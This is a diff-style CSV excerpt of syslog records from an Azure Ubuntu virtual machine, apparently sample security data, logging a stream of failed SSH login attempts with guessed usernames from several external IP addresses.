+7039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:49,UbuntuDevEnv,2019-06-26 17:14:49,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 38571:11: Bye Bye [preauth],46831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,38571,,
+7040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:14:49,UbuntuDevEnv,2019-06-26 17:14:49,auth,UbuntuDevEnv,info,Disconnected from invalid user ur 81.0.212.18 port 38571 [preauth],46831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ur,81.0.212.1,38571,,
+7041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:07,UbuntuDevEnv,2019-06-26 17:15:06,auth,UbuntuDevEnv,info,Invalid user wayne from 35.154.19.93 port 55064,46930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wayne,35.154.19.9,55064,,
+7042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:07,UbuntuDevEnv,2019-06-26 17:15:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:07,UbuntuDevEnv,2019-06-26 17:15:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,46930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+7044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:09,UbuntuDevEnv,2019-06-26 17:15:08,auth,UbuntuDevEnv,info,Failed password for invalid user wayne from 35.154.19.93 port 55064 ssh2,46930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wayne,35.154.19.9,55064,,
+7045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:09,UbuntuDevEnv,2019-06-26 17:15:09,auth,UbuntuDevEnv,info,Disconnected from invalid user wayne 35.154.19.93 port 55064 [preauth],46930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wayne,35.154.19.9,55064,,
+7046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:09,UbuntuDevEnv,2019-06-26 17:15:09,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 55064:11: Normal Shutdown, Thank you for playing [preauth]",46930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,55064,,
+7047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:38,UbuntuDevEnv,2019-06-26 17:15:37,auth,UbuntuDevEnv,info,Invalid user oracle5 from 77.237.69.165 port 46764,47100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,77.237.69.1,46764,,
+7048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:38,UbuntuDevEnv,2019-06-26 17:15:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:38,UbuntuDevEnv,2019-06-26 17:15:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,47100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:40,UbuntuDevEnv,2019-06-26 17:15:39,auth,UbuntuDevEnv,info,Failed password for invalid user oracle5 from 77.237.69.165 port 46764 ssh2,47100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,77.237.69.1,46764,,
+7051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:40,UbuntuDevEnv,2019-06-26 17:15:39,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 46764:11: Bye Bye [preauth],47100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,46764,,
+7052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:40,UbuntuDevEnv,2019-06-26 17:15:39,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle5 77.237.69.165 port 46764 [preauth],47100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle5,77.237.69.1,46764,,
+7053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:51,UbuntuDevEnv,2019-06-26 17:15:51,auth,UbuntuDevEnv,info,Invalid user elena from 74.94.246.82 port 49058,47148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elena,74.94.246.8,49058,,
+7054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:51,UbuntuDevEnv,2019-06-26 17:15:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,47148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:51,UbuntuDevEnv,2019-06-26 17:15:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:54,UbuntuDevEnv,2019-06-26 17:15:53,auth,UbuntuDevEnv,info,Failed password for invalid user elena from 74.94.246.82 port 49058 ssh2,47148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elena,74.94.246.8,49058,,
+7057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:54,UbuntuDevEnv,2019-06-26 17:15:53,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 49058:11: Bye Bye [preauth],47148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,49058,,
+7058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:15:54,UbuntuDevEnv,2019-06-26 17:15:53,auth,UbuntuDevEnv,info,Disconnected from invalid user elena 74.94.246.82 port 49058 [preauth],47148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elena,74.94.246.8,49058,,
+7059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:16,UbuntuDevEnv,2019-06-26 17:16:15,auth,UbuntuDevEnv,info,Invalid user steamcmd from 171.8.199.77 port 37594,47234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steamcmd,171.8.199.7,37594,,
+7060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:16,UbuntuDevEnv,2019-06-26 17:16:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:16,UbuntuDevEnv,2019-06-26 17:16:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,47234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+7062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:18,UbuntuDevEnv,2019-06-26 17:16:18,auth,UbuntuDevEnv,info,Failed password for invalid user steamcmd from 171.8.199.77 port 37594 ssh2,47234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steamcmd,171.8.199.7,37594,,
+7063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:19,UbuntuDevEnv,2019-06-26 17:16:19,auth,UbuntuDevEnv,info,Disconnected from invalid user steamcmd 171.8.199.77 port 37594 [preauth],47234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steamcmd,171.8.199.7,37594,,
+7064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:19,UbuntuDevEnv,2019-06-26 17:16:19,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 37594:11: Bye Bye [preauth],47234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,37594,,
+7065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:20,UbuntuDevEnv,2019-06-26 17:16:19,auth,UbuntuDevEnv,info,Invalid user fb from 111.230.29.17 port 34626,47248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fb,111.230.29.1,34626,,
+7066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:20,UbuntuDevEnv,2019-06-26 17:16:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:20,UbuntuDevEnv,2019-06-26 17:16:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,47248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+7068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:22,UbuntuDevEnv,2019-06-26 17:16:21,auth,UbuntuDevEnv,info,Failed password for invalid user fb from 111.230.29.17 port 34626 ssh2,47248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fb,111.230.29.1,34626,,
+7069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:22,UbuntuDevEnv,2019-06-26 17:16:22,auth,UbuntuDevEnv,info,Disconnected from invalid user fb 111.230.29.17 port 34626 [preauth],47248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fb,111.230.29.1,34626,,
+7070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:16:22,UbuntuDevEnv,2019-06-26 17:16:22,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 34626:11: Bye Bye [preauth],47248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,34626,,
+7071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:05,UbuntuDevEnv,2019-06-26 17:17:04,auth,UbuntuDevEnv,info,Invalid user francesco from 77.237.69.165 port 53951,47416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,77.237.69.1,53951,,
+7072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:05,UbuntuDevEnv,2019-06-26 17:17:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:05,UbuntuDevEnv,2019-06-26 17:17:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,47416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:07,UbuntuDevEnv,2019-06-26 17:17:06,auth,UbuntuDevEnv,info,Failed password for invalid user francesco from 77.237.69.165 port 53951 ssh2,47416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,77.237.69.1,53951,,
+7075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:07,UbuntuDevEnv,2019-06-26 17:17:06,auth,UbuntuDevEnv,info,Disconnected from invalid user francesco 77.237.69.165 port 53951 [preauth],47416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,77.237.69.1,53951,,
+7076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:07,UbuntuDevEnv,2019-06-26 17:17:06,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 53951:11: Bye Bye [preauth],47416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,53951,,
+7077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:21,UbuntuDevEnv,2019-06-26 17:17:20,auth,UbuntuDevEnv,info,Invalid user byu from 74.94.246.82 port 38038,47472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,byu,74.94.246.8,38038,,
+7078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:21,UbuntuDevEnv,2019-06-26 17:17:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:21,UbuntuDevEnv,2019-06-26 17:17:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,47472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:23,UbuntuDevEnv,2019-06-26 17:17:23,auth,UbuntuDevEnv,info,Failed password for invalid user byu from 74.94.246.82 port 38038 ssh2,47472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,byu,74.94.246.8,38038,,
+7081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:23,UbuntuDevEnv,2019-06-26 17:17:23,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 38038:11: Bye Bye [preauth],47472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,38038,,
+7082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:23,UbuntuDevEnv,2019-06-26 17:17:23,auth,UbuntuDevEnv,info,Disconnected from invalid user byu 74.94.246.82 port 38038 [preauth],47472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,byu,74.94.246.8,38038,,
+7083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:57,UbuntuDevEnv,2019-06-26 17:17:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17  user=test,47591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,111.230.29.1,,0,
+7084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:59,UbuntuDevEnv,2019-06-26 17:17:59,auth,UbuntuDevEnv,info,Failed password for test from 111.230.29.17 port 48012 ssh2,47591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,48012,,
+7085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:59,UbuntuDevEnv,2019-06-26 17:17:59,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 48012:11: Bye Bye [preauth],47591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,48012,,
+7086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:17:59,UbuntuDevEnv,2019-06-26 17:17:59,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 111.230.29.17 port 48012 [preauth],47591,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,111.230.29.1,48012,,
+7087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:18,UbuntuDevEnv,2019-06-26 17:18:17,auth,UbuntuDevEnv,info,Invalid user testing from 171.8.199.77 port 52290,47670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testing,171.8.199.7,52290,,
+7088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:18,UbuntuDevEnv,2019-06-26 17:18:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:18,UbuntuDevEnv,2019-06-26 17:18:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,47670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+7090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:20,UbuntuDevEnv,2019-06-26 17:18:19,auth,UbuntuDevEnv,info,Failed password for invalid user testing from 171.8.199.77 port 52290 ssh2,47670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testing,171.8.199.7,52290,,
+7091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:21,UbuntuDevEnv,2019-06-26 17:18:20,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 52290:11: Bye Bye [preauth],47670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,52290,,
+7092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:21,UbuntuDevEnv,2019-06-26 17:18:20,auth,UbuntuDevEnv,info,Disconnected from invalid user testing 171.8.199.77 port 52290 [preauth],47670,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testing,171.8.199.7,52290,,
+7093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:31,UbuntuDevEnv,2019-06-26 17:18:30,auth,UbuntuDevEnv,info,Invalid user rakuya from 77.237.69.165 port 32907,47724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,77.237.69.1,32907,,
+7094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:31,UbuntuDevEnv,2019-06-26 17:18:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:31,UbuntuDevEnv,2019-06-26 17:18:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,47724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:33,UbuntuDevEnv,2019-06-26 17:18:32,auth,UbuntuDevEnv,info,Failed password for invalid user rakuya from 77.237.69.165 port 32907 ssh2,47724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,77.237.69.1,32907,,
+7097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:33,UbuntuDevEnv,2019-06-26 17:18:32,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 32907:11: Bye Bye [preauth],47724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,32907,,
+7098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:33,UbuntuDevEnv,2019-06-26 17:18:32,auth,UbuntuDevEnv,info,Disconnected from invalid user rakuya 77.237.69.165 port 32907 [preauth],47724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rakuya,77.237.69.1,32907,,
